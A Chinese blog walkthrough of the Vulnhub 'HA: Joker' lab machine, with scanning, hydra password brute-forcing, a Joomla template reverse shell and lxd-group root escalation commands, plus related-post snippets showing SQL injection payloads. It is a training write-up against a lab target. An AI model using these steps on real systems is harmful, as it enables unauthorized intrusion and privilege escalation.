Vulnhub: HA: Joker靶机

已于 2023-06-07 23:20:49 修改
阅读量188 收藏
点赞数
文章标签: web安全 网络安全 安全
于 2023-05-26 17:54:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130891803
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

访问8080端口提示需要登录,使用hydra爆破joker用户密码

hydra -l joker -P /usr/share/wordlists/rockyou.txt 192.168.111.130 -s 8080 http-get / -t 64

登录后发现是joomla cms,使用弱口令登录joomla后台,账号:joomla,密码:joomla

修改后台页面拿shell

访问http://192.168.111.130:8080/templates/beez3/error.php,获得反弹shell

提权

当前用户处于lxd组,利用lxd进行提权

利用kali自带的脚本进行提权

生成提权用的tar.gz文件

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

上传46978.sh脚本和生成的tar.gz文件到目标执行,进入容器后,进入/mnt/root 以查看主机中的所有资源

./46978.sh -f alpine-v3.18-x86_64-20230526_1649.tar.gz

flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试——joker靶场漏洞复现
人若有志,就不会在半坡停止。
10-21 1770
目标的子域是一个重要的测试点,你收集到的可用的子域名越多,意味着你的机会也就越多,所以说要尽可能的收集目标的子域名。一个网站可能会开放多个不同的端口,而我们可以通过同一网站的不同端口进行测试,扫描开放端口的方法有很多,这里我分为两种:第一种在线端口扫描,第二种利用工具扫描端口。目录扫描我分为两种:一种时在线目录扫描,一种是利用工具扫描目录。信息收集方式:扫描(端口扫描、漏洞扫描)、公开信息(搜索引擎、网站、论坛、媒体报道、微步社区、潮汐指纹、站长之家、子域名挖掘、备案号)、其他方式(钓鱼邮件、社工)
Vulnhub靶机joker
weixin_53507480的博客
12-13 386
vulhub靶机joker黑盒渗透
基于Ha-Joker靶场的完整渗透测试演示直至提权(root)
爱吃仡坨的Blog
10-21 1246
通过nmap扫描得到的信息我们发现目标开放了80和8080服务,通过验证80端口的web服务没有利用点属于纯静态页面;但是可以遍历出一些信息便于我们之后构造爆破字典8080的http服务我们可以尝试爆破获取其username,password。
vulhub靶机joker渗透
qq_56666960的博客
02-07 2933
vulhub靶机joker渗透
一、Vue.js快速入门-Vue基础
c851204293的博客
08-31 3015
1.Vue基础 01-基本介绍 掌握HTML,CSS,JavaScript,AJAX基础知识 选择开发工具(VSCode或者Webstorm) 02-Vue简介 JavaScript框架 简化Dom操作 响应式数据驱动 官方文档-https://cn.vuejs.org 03-第一个Vue程序 2.本地应用 3.网络应用 4.综合应用 ...
Vulnhub实战-prime1
zhhhrj的博客
09-16 800
VulnHub 是一个面向信息安全爱好者和专业人士的虚拟机(VM)漏洞测试平台。它提供了一系列特制的漏洞测试虚拟机镜像,供用户通过攻击和漏洞利用的练习来提升自己的安全技能。本次,我们本次测试的是prime1。
纸牌游戏::joker:
02-18
《构建基于JavaScript与jQuery的"Joker"纸牌游戏》 在编程领域,尤其是Web开发中,JavaScript和jQuery是不可或缺的工具。本项目名为"Joker",是一款使用JavaScript和jQuery实现的纸牌游戏,旨在提供一个有趣的用户...
MyMemory:可自定义的Android记忆游戏:eyes::joker::red_heart:
05-05
我的记忆 作者: 观看开源的Android记忆游戏。 使用默认图标玩,或使用手机中的照片玩自定义游戏。 您也可以通过输入游戏名称来下载他人制作的内存板。 您可以尝试以下示例游戏: corgi rahul bitmoji 使用的开源库...
:lion: :joker: :mobile_phone: 一款动物配对益智纸牌游戏– 使用回合制游戏引擎boardgame.io 和React-Native + React-Native-Web 构建
06-08
Matchimals.fun 一款动物配对益智纸牌游戏:lion: :joker: :red_apple: 从 App Store 下载 iOS 版 :robot: 从 Google Play Store 下载 Android 版:desktop_computer: 在网络桌面上玩 如何玩 1-4 名玩家轮流连接顶部的...
joker:cmd-f 2021
03-07
"joker:cmd-f 2021"项目是一个基于React技术构建的Web应用程序,它最初的设计灵感来源于一个玩笑的机器人。随着时间的发展,这个项目逐渐演变成一个实用工具,能够根据新闻数据来分析和展示股市的情绪变化。在这个...
joker:JavaScript百搭号码生成
04-24
标题“joker:JavaScript百搭号码生成”暗示我们讨论的是一个使用JavaScript编写的程序,它能够生成某种形式的随机号码,可能类似于扑克牌中的“小丑”或“万能牌”,这种牌在某些规则下可以替代任何其他牌。...
23. CTF综合靶机渗透(十六)
weixin_30564785的博客
08-19 1086
靶机说明: VM Name: JIS-CTF : VulnUpload Difficulty: Beginner Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags. Only working with Virt...
服务器可以做为靶机吗_原创干货 | 从0到1靶机渗透实例之HA:joker
weixin_39705435的博客
11-19 469
听说转发文章会给你带来好运前言国庆过后事情慢慢没那么多了,我就开始整理了一下这个靶机的WP。这次靶机整体难度不算高,而且整个镜像也不大,适合新手练手使用。环境靶机HA:Joker(ubuntu)Filename: joker.zipFile size: 856 MBMD5: F34A2D25CF07D119F4E19D7D0FCC3DE2SHA1: 380E9DABF962390184...
web安全学习笔记(三)——SQL注入靶机测试
jokerhappy的博客
06-13 982
今天尝试了SQL注入靶机爆库爆表操作,分享如下: 1.设置靶机安全级别为低级 2.进入SQL注入界面 3.输入1提交 3.用单引号让id闭合,输入1’ union select 1, database()# 4.既然知道了数据库,就尝试爆出数据库中的表,输入 1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’# 5.爆出表名如上图所示,尝试爆出users表的列,输入 1’ uni
vulnhub靶机测试-HA: Joker
桜的博客
05-07 775
靶机导入虚拟机设置为NAT 首先找到靶机ip Ok,找到靶机ip 盲猜下端口8080: 抓包看看,base64。 进行爆破 登录进来是这样的 用刚才的密码登录不了,看下源码 是joomla的 百度了一下默认的后台: Joomla默认密码进入后台: 在模板的 index.php中写入shell <?php function which($pr) { $pat...
FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》
FairGuard手游加固(企业官方博客)
07-19 432
FairGuard游戏加固作为游戏安全行业领先的第三方服务商,凭借技术创新、产品服务及市场反馈等多方面优异表现获得业界认可,实力入选移动应用安全细分领域。
网站验证:确保网络安全与信任的重要步骤
最新发布
07-22 213
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
【DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
weixin_60838266的博客
07-21 1212
DVWA靶场漏洞复现之文件上传+文件包含。
2024年对网络安全专业的观点解析
goodxianping的专栏
07-17 653
网络安全专业的毕业生能够适应多个行业和岗位,包括但不限于政府部门、金融机构、大型互联网公司、电信运营商、科研机构的安全团队。学历较低、经验不足的大量初级从业人员与企业的需求不匹配,一方面找工作难,一方面企业招聘不到合适的安全人员,导致供需矛盾。在网络安全领域,学历并非衡量一个人能力的唯一标准,但普遍较低的学历水平确实反映了行业人才结构的某些问题。张雪峰对网络安全专业的看法是积极和乐观的。随着信息时代的到来,各类企业和组织对网络安全的需求越来越大,使得该专业的毕业生在市场上拥有很大的需求量。
47 29 C:\Users\joker\Desktop\gpt.cpp [Error] 'fastPowMod' was not declared in this scope
05-18
这个错误提示是因为你在使用 `fastPowMod` 函数时,编译器无法找到该函数的声明。可能的原因包括: 1. 你没有包含 `fastPowMod` 函数所在的头文件。在使用自定义函数时,需要在文件开头添加 `#include` 指令来引入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值